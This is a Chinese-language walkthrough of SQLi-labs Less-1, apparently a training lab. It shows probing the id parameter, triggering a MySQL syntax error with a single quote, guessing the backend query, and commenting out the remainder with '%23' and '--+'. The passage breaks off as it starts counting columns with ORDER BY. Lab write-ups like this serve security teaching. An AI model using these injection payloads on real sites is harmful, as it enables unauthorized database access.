Less-1
-
检测id的字段类型
分别构造如下payload,比对返回结果 xxxxxxxx.app.mituan.zone/Less-1/?id=1 xxxxxxxx.app.mituan.zone/Less-1/?id=2 xxxxxxxx.app.mituan.zone/Less-1/?id=1+1
可以发现id=1+1与id=1的返回结果是一样的,说明1+1并没有被执行,基本可以认定id的字段类型为STRING或者类似非数字类型。
-
寻找注入点
首先使用基本起手式,构造如下url进行访问 xxxxxxxx.app.mituan.zone/Less-1/?id=1'
报错如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
-
猜测SQL语句
根据页面返回的报错内容可以大概猜测后端实现SQL的方式,可能的SQL语句如下所示 SELECT username,password,3,4,5... from user where id = '$id' LIMIT 0,1; 根据猜测的SQL语句,进行验证,构造payload如下 xxxxxxxx.app.mituan.zone/Less-1/?id=1'%23 xxxxxxxx.app.mituan.zone/Less-1/?id=1'--+ payload可以正常进行查询,开始尝试构建payload
-
测试这个select一共查询有多少列内容
使用order